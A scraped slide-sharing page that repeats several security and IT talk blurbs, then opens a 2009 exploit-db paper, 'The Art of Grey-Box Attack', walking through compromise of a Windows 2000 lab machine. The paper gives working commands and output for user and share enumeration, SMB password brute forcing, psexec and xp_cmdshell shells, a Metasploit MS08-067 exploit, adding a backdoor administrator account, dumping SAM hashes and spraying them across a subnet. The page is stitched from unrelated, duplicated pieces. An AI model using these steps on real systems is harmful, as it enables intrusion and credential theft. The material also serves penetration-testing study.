The document discusses techniques for conducting a "grey-box" attack on Windows and Linux systems. It covers scanning and enumeration of open ports and services using Nmap to identify vulnerabilities. It then discusses methods for gaining initial access, including exploiting the null session vulnerability in Windows 2000 to enumerate user accounts. It also discusses privilege escalation techniques to gain full control of compromised systems. The document provides examples using Nmap and Metasploit to automate vulnerability scanning and exploitation.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
As every coin has two side as a same way we know only the single side of Nmap which is port scanning.
While researching I found that a lot more other than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah it won't work as efficiently as of MSF.
This can replace the use of acunetix and other paid version scanner.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
As every coin has two side as a same way we know only the single side of Nmap which is port scanning.
While researching I found that a lot more other than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah it won't work as efficiently as of MSF.
This can replace the use of acunetix and other paid version scanner.
This presentation, DEFEATING THE NETWORK SECURITY INFRASTRUCTURE v1.0.pdf, was made after some brainstorming
with some friends. The techniques used are not new and the tools readily available for download. The purpose of the discussion however
is to debate how internal enterprise resources might be (in)adversely exposed to the internet by in an insider using a combination of common techniques such as SSH and SSL.
How to Troubleshoot OpenStack Without Losing SleepSadique Puthen
The complex architecture, design, and difficulties while troubleshooting amplifies the effort in debugging a problem with an OpenStack environment. This can give administrators and support associates sleepless nights if OpenStack native and supporting components are not configured properly and tuned for optimum performance, especially with large deployments that involve high availability and load balancing.
An in depth overview of the possibilities of SNMP. How to monitor your environment using SNMP.
Learn what you can do with SNMP and what SNMP can do for you within one hour. Most aspects of SNMP are addressed. Getting the information, setting values, but also how the information is presented and the difference between the OID and the MIBs.
In this presentation I’m trying to make SNMP “simple” again and understandable for everybody.
This presentation, DEFEATING THE NETWORK SECURITY INFRASTRUCTURE v1.0.pdf, was made after some brainstorming
with some friends. The techniques used are not new and the tools readily available for download. The purpose of the discussion however
is to debate how internal enterprise resources might be (in)adversely exposed to the internet by in an insider using a combination of common techniques such as SSH and SSL.
How to Troubleshoot OpenStack Without Losing SleepSadique Puthen
The complex architecture, design, and difficulties while troubleshooting amplifies the effort in debugging a problem with an OpenStack environment. This can give administrators and support associates sleepless nights if OpenStack native and supporting components are not configured properly and tuned for optimum performance, especially with large deployments that involve high availability and load balancing.
An in depth overview of the possibilities of SNMP. How to monitor your environment using SNMP.
Learn what you can do with SNMP and what SNMP can do for you within one hour. Most aspects of SNMP are addressed. Getting the information, setting values, but also how the information is presented and the difference between the OID and the MIBs.
In this presentation I’m trying to make SNMP “simple” again and understandable for everybody.
SecZone 2011 - Cali, Colombia
(29th Nov. 2011)
SAP (in)security:
Scrubbing SAP clean with SOAP
------
Note
------
This is a slightly updated version of my Hashdays 2011 talk.
----------
Abstract:
----------
At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP!
----------
Network scanning with Nmap for Noobs and Ninjas - This slide was presented at Null Delhi monthly security meet by Nikhil and Jayvardhan.
https://www.facebook.com/nullOwaspDelhi/
This paper introduce practical techniques used by hackers to break the wireless security.
We recommend that the reader should have basic knowledge of wireless operation.
Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing.
The practical section that Etienne made (with Ponies) will come soon.
Lab-5 Scanning and Enumeration Reconnaissance and inform.docxLaticiaGrissomzz
Lab-5: Scanning and Enumeration
Reconnaissance and information gathering methods were passive methods, meaning that they did not cause any alarm, alerts, and log file creation on the target systems: franklin.edu computers. In Lab-5, you will actively scan and enumerate target systems. These actions would cause some log files and probably trigger alerts if the target systems were used by a sensitive organization, such as a military or financial institution.
You will perform Lab-5 by using the Netlab environment provided by Franklin University. Netlab environment is an isolated environment with no Internet connection so that none of your actions will cause anything harmful for you or the target system. Section-1: Scan the Network Using nbtscan Tool
nbtscan is used for scanning networks to obtain NetBIOS names, file shares, and other information. It is one of the tools that come with Kali Linux. Nbtscan is a convenient tool to scan the active computers on the network quickly.
Windows machines have NetBIOS names by default. Linux/Unix computer may also have NetBIOS names if the Samba interoperability suite is installed.
Before starting scanning the network from Kali Linux, you have to learn the network address first.
1) Enter the Netlab environment
2) Open Kali Linux and enter the password (password: toor)
3) Open a terminal window
4) Type this command:
ifconfig
The IP address of your computer is 192.168.2.10, and the netmask is 255.255.255.0. That means the network address is 192.168.2.0/24. You will use this in your nbtscan.
5) Run a nbtscan by typing
nbtscan 192.168.2.0/24 to the terminal window. You will see all active computers along with IP addresses, NetBIOS names, and MAC addresses. That is an essential piece of information for a pentester and can be regarded as your initial attack surface.
Take a screenshot of the terminal window.
Section-2: Scan the Network by Using Nmap
You will perform another network scan by using a more versatile tool called Nmap. Nmap is one of the swiss knives of the pen-testers. It is a free and open-source tool and comes with Kali Linux. Nmap has many different scanning options; it can even perform vulnerability scanning in addition to network and host scanning. In this lab, you will first use Nmap's network/host scanning features, and then you will perform vulnerability scanning with Nmap.
1) Type in
nmap 192.168.2.0/24 -n -sn in the terminal window.
Take a screenshot of the terminal window.
Type in
mannmap in the terminal window to see the help page of the Nmap tool. Find why you used n and sn options.
Section-3: Perform a Port Scan Against a Host
In the previous section, you scanned the network by using Nmap. In this section, you will scan a specific host for open ports.
1) Type in
nmap 192.168.2.14 -n in the terminal window.
Take a screenshot.
Serão demonstradas diversas técnicas de ataque, tais como: Injeções de codigos,brute force, backdoors, root kits, exploits e várias outras maneiras para acessar e se manter indevidamente a servidores,em contra-partida são discutidas melhores praticas para se
evitar os tipos de ataques citados. (Palestra realizada no 3º Festival de Software livre em belo horizonte - FSLBH)
An Express Guide ~ SNMP for Secure Rremote Resource MonitoringAbhishek Kumar
It's an Express Guide to "Basic & Secure Setup of SNMP with purpose of Remote Resource Monitoring" ~~~~~ described here with a use-case of setting it up for monitoring availability of Network Connection on a remote machine and Trap notification in case the link goes down ~~~~~ for both Linux & Windows platforms
Due to the fast-growing on mobile application trends along with business competition, the lack of security concern on mobile development become critical issues which may lead to reputation damage, financial loss and non-compliance (e.g. Privacy and Cybersecurity laws). It's time to focus on Mobile Defense-in-Dev(Depth) !!
The talk will provide the real-world case-studies on mobile application threats in conjunction with the cybersecurity risk mitigation using Secure development standard and guideline which should be integrated into the development process.
The session will provide the risk of insecure mobile application development in various types with demonstration; Client-side, Communication channel and Server side. The presentation includes case study of insecure development practice which lead attacker to abuse the vulnerable application (e.g. Coin/Gem cheating on gaming app, Bypassing security control on client-side and server-side).
TL;DR
Motivation
Dynamic binary instrumentation
FRIDA
DBI without rooting / jailbreaking
Unleash the power of Frida
Case study for runtime exploitation
Countermeasure
References
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
The Art of Grey-Box Attack
1. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
The Art of Grey-Box Attack
|=--------------------------------------------------------------------=|
|=-----------------=[ The Art of Grey-Box Attack ]=-------------------=|
|=--------------------------=[ 4 July 2009 ]=-------------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : The Art of Grey-Box Attack
Author : ZeQ3uL (Prathan Phongthiproek)
JabAv0C (Wiswat Aswamenakul)
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-07-04
##########
Contents
##########
[0x00] - Introduction
[0x01] - The Art of Microsoft Windows Attack
[0x01a] - Scanning & Enumeration
[0x01b] - Gaining Access
[0x01c] - Escalating Privilege
[0x02] - The Art of Unix/Linux Attack
[0x02a] - Scanning & Enumeration
[0x02b] - Gaining Access
[0x02c] - Escalating Privilege
[0x03] - Metasploit Ninja-Autopwned
[0x03a] - Nmap+Metasploit Autopwned
[0x03b] - Nessus+Metasploit Autopwned
[0x04] - Client-Side Attack with Metasploit
[0x04a] - Metasploit Payload Generator
[0x04b] - MS-Office Macro Ownage
[0x04c] - AdobeReader PDF Ownage
[0x05] - References
[0x06] - Greetz To
#######################
[0x00] - Introduction
#######################
Hi all, in this paper, we will guide you about methods to hacking into Windows
system and linux system. Moreover, we also show the ways to use popular hacking tools,
nmap and metasploit. Those tools are more powerfull than day in the past (We will see it ;D)
We divide the paper into 7 sections from 0x00 to 0x06. However, only section 0x01 to
0x04 are technical issue. Section 0x01, we show the steps to hack into Windows 2000 operating
system. Section 0x02, we switch to talk about steps of linux hacking. The next section, 0x03,
mentions about automatic exploiting by using metasploit combining with nmap or nessus.
The last technical section lets you see examples of exploiting client software in order to
get access to a system :-D
##############################################
[0x01] - The Art of Microsoft Windows Attack
##############################################
In this section, we talk about attacking Windows machines in network. We will start with scanning
and enumeration then we move to gain access to Windows system and, finally, escalating privilege
in order to control the machine completely and use the machine to attack other machines in the network.
++++++++++++++++++++++++++++++++++
[0x01a] - Scanning & Enumeration
++++++++++++++++++++++++++++++++++
First, start with scanning by using nmap (http://nmap.org) which is the best in our opinion.
New version of nmap improves scanning speed, mappes port with service name and adds custom script feature
which is perfect use for penetration testing.
The first example, We use nmap to scan for openning ports which are the channels to attack the system:
1 of 17 12/24/10 5:51 PM
2. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
[Nmap Result]-----------------------------------------------------------------------------------
bt nmap-4.85BETA10 # nmap -sV 192.168.80.129
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency rea
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
135/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe)
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
3372/tcp open msdtc?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at h
SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"x18xc1n0xx01")%r(RTSPRequest,6,"x18xc1n0xx01")
SF:%r(HTTPOptions,6,"x18xc1n0xx01")%r(Help,6,"x18xc1n0xx01")%r(S
SF:SLSessionReq,6,"x18xc1n0xx01")%r(FourOhFourRequest,6,"x18xc1n0
SF:xx01")%r(LPDString,6,"x18xc1n0xx01")%r(SIPOptions,6,"x18xc1n0
SF:xx01");
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds
[End Result]------------------------------------------------------------------------------------
From result, we get a list of opening ports and we know that this system runs IIS, Netbios, Endpoint Mapper, SMB, MS
and the operating system is Windows 2000 (We pick Windows 2000 as the example because we want you to see the big picture of
Windows hacking). The next step is an information gathering from Netbios and SMB. Windows 2000 has "Null Session" vulnerabil
(Holygrail of Windows Vulnerability) which allows us to enumerate all accounts in the system including security policies,
local group, file share. We pick nmap to gather the information by using Nmap-script. In the past, We had to connect to the
through IPC$ (Null Session) then we had run command [net use 192.168.80.129 "" /u:""] after that we have enumerated the in
a tool such as Superscan4 or Winfo. Nowadays, Nmap(8.5Beta) can perform those tasks with help of Nmap-script (smb-enum-users
[Nmap Result]-----------------------------------------------------------------------------------
bt nmap-4.85BETA10 # nmap --script=smb-enum-users 192.168.80.129
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency rea
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Host script results:
| smb-enum-users:
|_ SERVERAdministrator, SERVERbackup, SERVERepp, SERVERepp_contractor, SERVERGuest, SERVERIUSR_SERVER, SERVERIWAM_SER
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
[End Result]------------------------------------------------------------------------------------
From Result, We know all user in target system:
- Administrator
- Backup
- epp
- epp_contractor
- Guest
- IUSR_SERVER
- IWAM_SERVER
- Jim
- John
- mary
- molly
- TsInternetUser
The Others techniques is Enumeration from "LDAP Anonymous" and SNMP Default Community string (Public/Private) that w
"LDAP Anonymous" => Using ldapminer
"Default SNMP Community String" => Using snmpwalk
2 of 17 12/24/10 5:51 PM
3. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
The shared files and folders are also important. If there is no properly permission setting, attack may directly upl
[Nmap Result]-----------------------------------------------------------------------------------
bt nmap-4.85BETA10 # nmap --script=smb-enum-shares 192.168.80.129
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency rea
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Host script results:
| smb-enum-shares:
| Anonymous shares: IPC$
|_ Restricted shares: COVERPG$, Fax$, Inetpub, scripts, ADMIN$, C$
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
[End Result]------------------------------------------------------------------------------------
From Result, We know all share files:
IPC << Anonymous Null Session
COVERPG
Fax
Inetpub
scripts
ADMIN
C
Next, We know all users from Null Session so we can bruteforce attack for their users with Nmap-script "smb-brute"
[Nmap Result]-----------------------------------------------------------------------------------
bt nmap-4.85BETA10 # nmap --script=smb-brute 192.168.80.129
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency rea
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Host script results:
| smb-brute:
| backup:pukcab => Login was successful
|_ epp:password => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds
[End Result]------------------------------------------------------------------------------------
Look at that result, We can brute weak password from users backup and epp.
++++++++++++++++++++++++++
[0x01b] - Gaining Access
++++++++++++++++++++++++++
Now we got 2 account credentials for attack, We choose "epp" that use password "password". Use psexec (Pstool from s
to spawn command shell back to our.
[Psexec Result]---------------------------------------------------------------------------------
C:>psexec 192.168.80.129 -u epp -p password -e cmd.exe
3 of 17 12/24/10 5:51 PM
4. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
PsExec v1.71 - Execute processes remotely
Copyright (C) 2001-2006 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:WINNTsystem32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2
C:WINNTsystem32>net user
User accounts for SERVER
------------------------------------------------------------------------------
Administrator backup epp
epp_contractor Guest IUSR_SERVER
IWAM_SERVER Jim John
mary molly TsInternetUser
The command completed successfully.
[End Result]------------------------------------------------------------------------------------
From Result, We can spawn their command shell with epp's privilege (Administrators) then Blah Blah Blah...
The target use MSSQL 2000, we guess they use default username/password for MSSQL 2000 (SA/blank password).So we use
xp_cmdshell, This stored procedure was gold mines for Hacker that use for interactive command shell. Attacker can use 'osql'
[Osql Result]-----------------------------------------------------------------------------------
C:>osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'dir c:' "
output
------------------------------------------------------------------------------
-----------------------------------------------------------------------
-----------------------------------------------------------------------
--------------------------------
Volume in drive C has no label.
Volume Serial Number is 50C0-6A72
NULL
Directory of c:
NULL
12/03/2004 04:39p 451 dir.txt
06/04/2004 03:49p <DIR> Documents and Settings
19/03/2009 12:47a <DIR> Inetpub
19/03/2009 12:38a <DIR> Program Files
03/07/2009 04:55p <DIR> WINNT
1 File(s) 451 bytes
4 Dir(s) 3,053,559,808 bytes free
NULL
C:>osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'net user' "
output
------------------------------------------------------------------------------
-----------------------------------------------------------------------
-----------------------------------------------------------------------
--------------------------------
-----------------------------------------------------------------------------
Administrator backup cwh
epp epp_contractor Guest
IUSR_SERVER IWAM_SERVER Jim
John mary molly
TsInternetUser
or more errors.
4 of 17 12/24/10 5:51 PM
5. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
NULL
NULL
[End Result]------------------------------------------------------------------------------------
Note: Nmap-script have "ms-sql-info.nse" for scaning machine that use account 'sa' with blank password too.
The Lastest Worm like Conficker/DownADup, Nmap-script can scan for MS08-067 Vulnerability ?? and System Infected Wor
[Nmap Result]-----------------------------------------------------------------------------------
bt nmap-4.85BETA10 # nmap --script=smb-check-vulns 192.168.80.129
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:35 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency rea
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
|_ Conficker: Likely CLEAN
Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds
[End Result]------------------------------------------------------------------------------------
Now we know target has MS08-067 vulnerability, Then use the G0d of Exploit suite => "Metasploit Framework"
[Msf Console]-----------------------------------------------------------------------------------
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
msf exploit(ms08_067_netapi) > set TARGET 1
TARGET => 1
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.80.129
RHOST => 192.168.80.129
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.80.131:51038 -> 192.168.80.129:4444)
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:WINNTsystem32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2
C:WINNTsystem32>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.
C:WINNTsystem32>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.
C:WINNTsystem32>net user
net user
User accounts for
-------------------------------------------------------------------------------
Administrator backup cwh
epp epp_contractor Guest
IUSR_SERVER IWAM_SERVER Jim
5 of 17 12/24/10 5:51 PM
6. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
John mary molly
TsInternetUser
The command completed with one or more errors.
[End Msf]---------------------------------------------------------------------------------------
The Most popular Tools for scanning, enumeration, vulnerability assessment is Nessus (www.www.nessus.org).That have
configuration audit, sensitive data discovery and vulnerability analysis. The Best thing, It's FREE !!!
++++++++++++++++++++++++++++++++
[0x01c] - Escalating Privilege
++++++++++++++++++++++++++++++++
The next step to do is Dump SAM file from target that get all hashing. Sure we can use Nmap !!
We can read the information in SAM file only when we have administrator's privilege (epp's account had administrators group)
[Nmap Result]-----------------------------------------------------------------------------------
bt nmap-4.85BETA10 # nmap --script=smb-pwdump --script-args=smbuser=epp,smbpass=password 192.168.80.129
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency rea
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Host script results:
| smb-pwdump:
| Administrator:1010 => F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
| backup:1005 => E84F09BA27610849AAD3B435B51404EE:94FF50F81F9885648A05438F63EA9F91
| epp:500 => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
| epp_contractor:1007 => 60F898DDDCAE534EAAD3B435B51404EE:148301D12E96ED2CE24A20C6ED9A2EAF
| Guest:501 => A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
| IUSR_SERVER:1001 => 0C2A09C60FF052D3518640B5D8EB223A:E9C4226B18D023A932473576E62EB5E9
| IWAM_SERVER:1002 => A373B0BEBCEED1FAD95379C32DAD5DEF:803F59A7EA1EA9A65A15310B58A015D3
| Jim:1009 => 209CA2D6E74286E9AAD3B435B51404EE:FF623167AECD14984A0A97E4D3989A89
| John:1004 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
| mary:1003 => 879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
| molly:1008 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
|_ TsInternetUser:1000 => 52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds
[End Result]------------------------------------------------------------------------------------
Now we got all hash from target system. In the past, Need to crack password by using a tool such as cain or rcrack
with a technique called "rainbow tables" but this action steal sleeping time from us. We can save that time by one of nmap f
Nmap can try to login to other machines with gathering hashes and list of usernames. We do not need to pre-crack the hashes.
[Nmap Result]-----------------------------------------------------------------------------------
bt nmap-4.85BETA10 # cat password.txt
F703F386322B0662E72C57EF50F76A05
E52CAC67419A9A224A3B108F3FA6CB6D
209CA2D6E74286E9AAD3B435B51404EE
bt nmap-4.85BETA10 # nmap --script=smb-brute --script-args=userdb=usernames.txt,passdb=password.txt 192.168.80.1/24
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency rea
